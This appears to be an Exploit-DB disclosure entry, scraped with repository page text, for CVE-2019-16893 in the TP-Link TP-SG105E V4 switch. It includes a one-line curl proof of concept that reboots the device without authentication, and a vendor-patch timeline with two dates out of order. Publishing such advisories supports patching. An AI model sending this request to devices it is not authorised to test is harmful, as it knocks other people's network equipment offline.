9a3ddbdd3a
5 changes to exploits/shellcodes Sudo 1.8.25p - Buffer Overflow Centreon 19.10.5 - 'Pollers' Remote Command Execution (Metasploit) F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)
32 lines
No EOL
1.2 KiB
Text
32 lines
No EOL
1.2 KiB
Text
# Exploit Title: TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot
|
|
# Date: 2020-01-20
|
|
# Exploit Author: PCEumel
|
|
# Vendor Homepage: https://www.tp-link.com/
|
|
# Software Link: https://www.tp-link.com/us/support/download/tl-sg105e/#Firmware
|
|
# Version: TP-Link TP-SG105E V4
|
|
# Tested on: TP-SG105E V4 1.0.0 Build 20181120
|
|
# Patch from vendor : https://static.tp-link.com/2020/202001/20200120/TL-SG105Ev4.0_en_1.0.0_[20200119-rel.52079]_up.zip
|
|
# CVE : CVE-2019-16893
|
|
|
|
# TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot
|
|
# The TP-Link TP-SG105E is a "5-Port Gigabit Easy Smart Switch".
|
|
# It features a web front end and an application (Easy Smart Configuration Utility)
|
|
# for easy configuration management.
|
|
|
|
# The device does not properly restrict access to an internal API.
|
|
# It is therefore possible to remotely reboot the device by sending a HTTP POST
|
|
# request.
|
|
|
|
---
|
|
|
|
# POC :
|
|
curl -d "reboot_op=reboot" -X POST http://192.168.1.10/reboot.cgi
|
|
|
|
---
|
|
|
|
Timeline :
|
|
2019-09-16 | Vendor notified
|
|
2019-09-25 | Reply (they will patch it)
|
|
2019-12-24 | First patch for testing
|
|
2019-12-19 | Confirmed the functionality of the patch
|
|
2020-01-14 | Public patch available |